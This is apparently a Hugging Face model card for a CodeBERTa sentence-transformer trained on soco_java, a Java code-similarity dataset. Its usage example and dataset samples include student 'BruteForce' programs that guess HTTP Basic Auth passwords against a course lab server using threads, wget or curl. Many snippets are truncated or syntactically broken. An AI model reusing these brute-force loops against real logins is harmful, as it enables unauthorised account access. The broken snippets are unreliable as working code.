SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: huggingface/CodeBERTa-small-v1
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
- Training Dataset:- soco_java
 
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
  (0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss-2")
# Run inference
sentences = [
    '\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n        \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n        \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n        \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n        \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n        \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n        \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n        \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n  for(int j=0;j<52;j++)\n  {\n   for(int k=0;k<52;k++)\n   {\n    pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n    String userPassword = ":"+pwd;\n    RealThread myTh = new RealThread(i,userPassword);\n    Thread th = new Thread( myTh );\n    th.start();\n    try\n    {\n     \n     \n     th.sleep(100);\n    }\n    catch(Exception e)\n    {} \n   }\n  }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n  try\n  {\n  String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n  uc = (HttpURLConnection)url.openConnection();\n  uc.setRequestProperty ("Authorization", " " + encoding);\n  System.out.println("Reponse  = "+uc.getResponseCode()+"for pwd = "+userPassword);\n  this.responseCode = uc.getResponseCode();\n  \n  if(uc.getResponseCode()==200)\n  {\n     System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n     System.exit(0);\n  }\n\n  }\n  catch (Exception e) {\n  System.out.println("Could not execute Thread "+num+" ");\n  }\n }\n\n}\n',
    'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n    static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n    static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n    static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n    static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
    '\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t  \tProcess pr= null;\n\t  \tString Fmd5,Smd5,temp1;\n\t  \tint index;\n          \n\t \ttry\n          \t{\n\t\t    \n\t\t    pr = t.exec("md5sum csfirst.html");\n\n                    InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread = new BufferedReader(stre);\n\t\t    \n\t\t    s = bread.readLine();\n\t\t    index = s.indexOf(\' \');\n\t\t    Fmd5 = s.substring(0,index);\n\t\t    System.out.println(Fmd5);\n\t\t    \n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t    pr = null;\n\t\t    \n\t\t    pr = t.exec("md5sum index.html");\n\t\t    \n\n\t\t    InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n                    BufferedReader bread1 = new BufferedReader(stre1);\n\t\t    \n\t\t    temp1 = bread1.readLine();\n\t\t    index = temp1.indexOf(\' \');\n\t\t    Smd5 = temp1.substring(0,index);\n\t\t    System.out.println(Smd5);\n\t\t\n\t\t    pr = null;\n\t\t\n\t\t    if(Fmd5 == Smd5)\n\t\t       System.out.println("  changes Detected");\n\t\t    else\n\t\t    {\n\t\t       pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t       pr = null;\n\t\t       \n\t\t       try{\n\t\t       Thread.sleep(10000);\n\t\t       }catch(Exception e){}\n\t\t       \n\t\t       pr = t.exec(" Message.txt | mutt -s Chnages  Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t     \n\t\t       \n\t\t       \n\t\t    }   \n\t\t    \n    \t        }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Training Details
Training Dataset
soco_java
- Dataset: soco_java
- Size: 30,069 training samples
- Columns: label,text_1, andtext_2
- Approximate statistics based on the first 1000 samples:label text_1 text_2 type int string string details - 0: ~99.70%
- 1: ~0.30%
 - min: 51 tokens
- mean: 450.65 tokens
- max: 512 tokens
 - min: 51 tokens
- mean: 468.5 tokens
- max: 512 tokens
 
- Samples:label text_1 text_2 0
 
 import java.io.;
 import java.net.;
 import java.Runtime;
 import java.util.*;
 import java.net.smtp.SmtpClient;
 public class WatchDog
 {
 static String strImageOutputFile01 = "WebPageImages01.txt";
 static String strImageOutputFile02 = "WebPageImages02.txt";
 static String strWebPageOutputFile01 = "WebPageOutput01.txt";
 static String strWebPageOutputFile02 = "WebPageOutput02.txt";
 static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";
 static String strFromEmailDefault = "@.rmit.edu.";
 static String strToEmailDefault = "@.rmit.edu.";
 static String strFromEmail = null;
 static String strToEmail = null;
 public static void main (String args[])
 
 {
 
 
 
 
 
 URL url = null;
 HttpURLConnection urlConnection;
 int intContentLength;
 String strWebPageText = "";
 String strURL = "http://www.cs.rmit.edu./students/";
 String strPrePend = "...import java.io.;
 import java.net.;
 import java.util.*;
 public class Watchdog
 {
 public static void main(String args[])
 {
 
 String mainLink="http://www.cs.rmit.edu./students/";
 String sender = "@cs.rmit.edu.";
 String recipient = "";
 String hostName = "yallara.cs.rmit.edu.";
 int delay = 86400000;
 try
 {
 int imgSrcIndex, imgSrcEnd;
 String imgLink;
 Vector imageList = new Vector();
 HttpURLConnection imgConnection;
 URL imgURL;
 
 EmailClient email = new EmailClient(sender, recipient, hostName);
 
 URL url=new URL(mainLink);
 HttpURLConnection connection = (HttpURLConnection) url.openConnection();
 BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));
 
 FileWriter fwrite = new FileWriter("local.txt");
 BufferedWriter writefile = new BufferedWriter(fwrite);
 String line=webpage.readLine();
 while (line != null)
 {
 
 writefile.write(line,0,line.length());
 wri...0import java.util.;
 import java.io.;
 import java.;
 public class Dogs5
 {
 public static void main(String [] args) throws Exception
 {
 executes("rm index.");
 executes("wget http://www.cs.rmit.edu./students");
 while (true)
 {
 String addr= "wget http://www.cs.rmit.edu./students";
 executes(addr);
 String hash1 = md5sum("index.html");
 String hash2 = md5sum("index.html.1");
 System.out.println(hash1 +""+ hash2); 
 
 BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));
 String line=" " ;
 String line1=" " ;
 String line2=" ";
 String line3=" ";
 String[] cad = new String[10];
 
 executes("./.sh");
 
 int i=0;
 while ((line = buf.readLine()) != null)
 {
 
 line1="http://www.cs.rmit.edu./students/images"+line;
 if (i==1)
 line2="http://www.cs.rmi...0
 import java.util.;
 import java.text.;
 import java.io.;
 import java.;
 import java.net.*;
 public class WatchDog
 {
 public static void main(String args[])
 {
 String s = null;
 String webpage = "http://www.cs.rmit.edu./students/";
 
 
 String file1 = "file1";
 String file2 = "file2";
 
 try
 {
 Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);
 
 BufferedReader stdInput = new BufferedReader(new
 InputStreamReader(p.getInputStream()));
 BufferedReader stdError = new BufferedReader(new
 InputStreamReader(p.getErrorStream()));
 
 while ((s = stdInput.readLine()) != null) {
 System.out.println(s);
 }
 
 
 while ((s = stdError.readLine()) != null) {
 System.out.println(s);
 }
 
 try
 {
 p.waitFor();
 }
 catch...
 import java.io.;
 import java.net.;
 import java.util.;
 import java.String;
 import java.Object;
 import java.awt.;
 public class WatchDog
 {
 private URL url;
 private URLConnection urlcon;
 private int lastModifiedSince = 0;
 private int lastModified[] = new int[2];
 private int count = 0;
 public static String oldFile;
 public static String newFile;
 private String diffFile;
 private BufferedWriter bw;
 private Process p;
 private Runtime r;
 private String fileName;
 
 
 private ArrayList old[]= new ArrayList[500];
 private ArrayList news[] = new ArrayList[500];
 private String info = "";
 private int index = 0;
 public WatchDog(String fileName)
 {
 this.fileName = fileName;
 oldFile = fileName + ".old";
 newFile = fileName + ".new";
 diffFile = "testFile.txt";
 }
 public static void main(String args[])
 {
 WatchDog wd = new WatchDog("TestDog");
 wd.detectChange(WatchDog.oldFile);
 while (true)
 {
 try
 {
 Thread.slee...
- Loss: SoftmaxLoss
Evaluation Dataset
soco_java
- Dataset: soco_java at c8fab14
- Size: 3,342 evaluation samples
- Columns: label,text_1, andtext_2
- Approximate statistics based on the first 1000 samples:label text_1 text_2 type int string string details - 0: ~99.40%
- 1: ~0.60%
 - min: 51 tokens
- mean: 443.11 tokens
- max: 512 tokens
 - min: 51 tokens
- mean: 467.05 tokens
- max: 512 tokens
 
- Samples:label text_1 text_2 0
 import java.Runtime;
 import java.io.*;
 public class differenceFile
 {
 StringWriter sw =null;
 PrintWriter pw = null;
 public differenceFile()
 {
 sw = new StringWriter();
 pw = new PrintWriter();
 }
 public String compareFile()
 {
 try
 {
 Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");
 InputStream write = sw.getInputStream();
 BufferedReader bf = new BufferedReader (new InputStreamReader(write));
 String line;
 while((line = bf.readLine())!=null)
 pw.println(line);
 if((sw.toString().trim()).equals(""))
 {
 System.out.println(" difference");
 return null;
 }
 System.out.println(sw.toString().trim());
 }catch(Exception e){}
 return sw.toString().trim();
 }
 }
 import java.;
 import java.io.;
 import java.util.*;
 public class BruteForce
 {
 public static void main(String[] args)
 {
 Runtime rt = Runtime.getRuntime();
 Process pr= null;
 char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};
 String pass;
 char temp[] = {'a','a'};
 char temp1[] = {'a','a','a'};
 char temp2[] = {'a'};
 String f= new String();
 String resp = new String();
 int count=0;
 String success = new String();
 InputStreamReader instre;
 BufferedReader bufread;
 for(int k=0;k<52;k++)
 {
 temp2[0]=chars[k];
 pass = new String(temp2);
 count++;
 System.out.println("The password tried ...0import java.io.;
 import java.net.;
 import java.util.*;
 public class Watchdog
 {
 public static void main(String args[])
 {
 
 String mainLink="http://www.cs.rmit.edu./students/";
 String sender = "@cs.rmit.edu.";
 String recipient = "";
 String hostName = "yallara.cs.rmit.edu.";
 int delay = 86400000;
 try
 {
 int imgSrcIndex, imgSrcEnd;
 String imgLink;
 Vector imageList = new Vector();
 HttpURLConnection imgConnection;
 URL imgURL;
 
 EmailClient email = new EmailClient(sender, recipient, hostName);
 
 URL url=new URL(mainLink);
 HttpURLConnection connection = (HttpURLConnection) url.openConnection();
 BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));
 
 FileWriter fwrite = new FileWriter("local.txt");
 BufferedWriter writefile = new BufferedWriter(fwrite);
 String line=webpage.readLine();
 while (line != null)
 {
 
 writefile.write(line,0,line.length());
 wri...
 import java.net.;
 import java.io.;
 import java.String;
 import java.;
 import java.util.;
 public class BruteForce {
 private static final int passwdLength = 3;
 private static String commandLine
 = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";
 private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
 private int charLen = chars.length();
 private int n = 0;
 private int n3 = charLencharLencharLen;
 private String response;
 private String[] password = new String[charLencharLencharLen+charLen*charLen+charLen];
 private char[][] data = new char[passwdLength][charLen];
 private char[] pwdChar2 = new char[2];
 private char[] pwdChar = new char[passwdLength];
 private String url;
 private int startTime;
 private int endTime;
 private int totalTime;
 private float averageTime;
 private boolean finish;
 private Process curl;
 private BufferedReader bf, responseLine;
 ...0
 import java.io.;
 import java.awt.;
 import java.net.*;
 public class BruteForce
 {
 public static void main (String[] args)
 {
 String pw = new String();
 pw = getPassword ();
 System.out.println("Password is: "+pw);
 }
 public static String getPassword()
 {
 String passWord = new String();
 passWord = "AAA";
 char[] guess = passWord.toCharArray();
 Process pro = null;
 Runtime runtime = Runtime.getRuntime();
 BufferedReader in = null;
 String str=null;
 boolean found = true;
 System.out.println(" attacking.....");
 for (int i=65;i<=122 ;i++ )
 {
 guess[0]=(char)(i);
 for (int j=65;j<=122 ;j++ )
 {
 guess[1]=(char)(j);
 for (int k=65 ;k<=122 ;k++ )
 {
 guess[2]=(char)(k);
 passWord = new String(guess);
 String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";
 try
 {
 pro = runtime.exec(cmd);
 in = new BufferedReader(new InputStreamReader(pro.getErrorSt...
 import java.io.;
 import java.text.;
 import java.util.;
 import java.net.;
 public class BruteForce extends Thread
 {
 private static final String USERNAME = "";
 private static final char [] POSSIBLE_CHAR =
 {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};
 private static int NUMBER_OF_THREAD = 500;
 private static Date startDate = null;
 private static Date endDate = null;
 private String address;
 private String password;
 public BruteForce(String address, String password)
 {
 this.address = address;
 this.password = password;
 }
 public static void main(String[] args) throws IOException
 {
 if (args.length < 1)
 {
 System.err.println("Invalid usage!");
 System.err.println("...
- Loss: SoftmaxLoss
Training Hyperparameters
Non-Default Hyperparameters
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- learning_rate: 2e-05
- num_train_epochs: 1
- warmup_ratio: 0.1
- fp16: True
All Hyperparameters
Click to expand
- overwrite_output_dir: False
- do_predict: False
- eval_strategy: no
- prediction_loss_only: True
- per_device_train_batch_size: 16
- per_device_eval_batch_size: 16
- per_gpu_train_batch_size: None
- per_gpu_eval_batch_size: None
- gradient_accumulation_steps: 1
- eval_accumulation_steps: None
- torch_empty_cache_steps: None
- learning_rate: 2e-05
- weight_decay: 0.0
- adam_beta1: 0.9
- adam_beta2: 0.999
- adam_epsilon: 1e-08
- max_grad_norm: 1.0
- num_train_epochs: 1
- max_steps: -1
- lr_scheduler_type: linear
- lr_scheduler_kwargs: {}
- warmup_ratio: 0.1
- warmup_steps: 0
- log_level: passive
- log_level_replica: warning
- log_on_each_node: True
- logging_nan_inf_filter: True
- save_safetensors: True
- save_on_each_node: False
- save_only_model: False
- restore_callback_states_from_checkpoint: False
- no_cuda: False
- use_cpu: False
- use_mps_device: False
- seed: 42
- data_seed: None
- jit_mode_eval: False
- use_ipex: False
- bf16: False
- fp16: True
- fp16_opt_level: O1
- half_precision_backend: auto
- bf16_full_eval: False
- fp16_full_eval: False
- tf32: None
- local_rank: 0
- ddp_backend: None
- tpu_num_cores: None
- tpu_metrics_debug: False
- debug: []
- dataloader_drop_last: False
- dataloader_num_workers: 0
- dataloader_prefetch_factor: None
- past_index: -1
- disable_tqdm: False
- remove_unused_columns: True
- label_names: None
- load_best_model_at_end: False
- ignore_data_skip: False
- fsdp: []
- fsdp_min_num_params: 0
- fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- fsdp_transformer_layer_cls_to_wrap: None
- accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- deepspeed: None
- label_smoothing_factor: 0.0
- optim: adamw_torch
- optim_args: None
- adafactor: False
- group_by_length: False
- length_column_name: length
- ddp_find_unused_parameters: None
- ddp_bucket_cap_mb: None
- ddp_broadcast_buffers: False
- dataloader_pin_memory: True
- dataloader_persistent_workers: False
- skip_memory_metrics: True
- use_legacy_prediction_loop: False
- push_to_hub: False
- resume_from_checkpoint: None
- hub_model_id: None
- hub_strategy: every_save
- hub_private_repo: None
- hub_always_push: False
- gradient_checkpointing: False
- gradient_checkpointing_kwargs: None
- include_inputs_for_metrics: False
- include_for_metrics: []
- eval_do_concat_batches: True
- fp16_backend: auto
- push_to_hub_model_id: None
- push_to_hub_organization: None
- mp_parameters:
- auto_find_batch_size: False
- full_determinism: False
- torchdynamo: None
- ray_scope: last
- ddp_timeout: 1800
- torch_compile: False
- torch_compile_backend: None
- torch_compile_mode: None
- include_tokens_per_second: False
- include_num_input_tokens_seen: False
- neftune_noise_alpha: None
- optim_target_modules: None
- batch_eval_metrics: False
- eval_on_start: False
- use_liger_kernel: False
- eval_use_gather_object: False
- average_tokens_across_devices: False
- prompts: None
- batch_sampler: batch_sampler
- multi_dataset_batch_sampler: proportional
Training Logs
| Epoch | Step | Training Loss | Validation Loss | 
|---|---|---|---|
| 0.0532 | 100 | 0.2015 | 0.0240 | 
| 0.1064 | 200 | 0.0143 | 0.0209 | 
| 0.1596 | 300 | 0.0241 | 0.0241 | 
| 0.2128 | 400 | 0.0174 | 0.0213 | 
| 0.2660 | 500 | 0.0228 | 0.0206 | 
| 0.3191 | 600 | 0.0061 | 0.0226 | 
| 0.3723 | 700 | 0.0194 | 0.0208 | 
| 0.4255 | 800 | 0.0193 | 0.0197 | 
| 0.4787 | 900 | 0.0261 | 0.0175 | 
| 0.5319 | 1000 | 0.0189 | 0.0178 | 
| 0.5851 | 1100 | 0.0089 | 0.0188 | 
| 0.6383 | 1200 | 0.0174 | 0.0161 | 
| 0.6915 | 1300 | 0.0171 | 0.0162 | 
| 0.7447 | 1400 | 0.0149 | 0.0155 | 
| 0.7979 | 1500 | 0.011 | 0.0164 | 
| 0.8511 | 1600 | 0.0308 | 0.0160 | 
| 0.9043 | 1700 | 0.0048 | 0.0167 | 
| 0.9574 | 1800 | 0.0142 | 0.0164 | 
| 0.0532 | 100 | 0.0049 | - | 
| 0.1064 | 200 | 0.0117 | - | 
| 0.1596 | 300 | 0.0151 | - | 
| 0.2128 | 400 | 0.0152 | - | 
| 0.2660 | 500 | 0.0138 | - | 
| 0.3191 | 600 | 0.0051 | - | 
| 0.3723 | 700 | 0.0143 | - | 
| 0.4255 | 800 | 0.0155 | - | 
| 0.4787 | 900 | 0.0147 | - | 
| 0.5319 | 1000 | 0.0128 | - | 
| 0.5851 | 1100 | 0.0061 | - | 
| 0.6383 | 1200 | 0.0138 | - | 
| 0.6915 | 1300 | 0.0082 | - | 
| 0.7447 | 1400 | 0.0095 | - | 
| 0.7979 | 1500 | 0.0073 | - | 
| 0.8511 | 1600 | 0.0189 | - | 
| 0.9043 | 1700 | 0.0028 | - | 
| 0.9574 | 1800 | 0.0092 | - | 
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers and SoftmaxLoss
@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}
- Downloads last month
- -
Model tree for buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss-2
Base model
huggingface/CodeBERTa-small-v1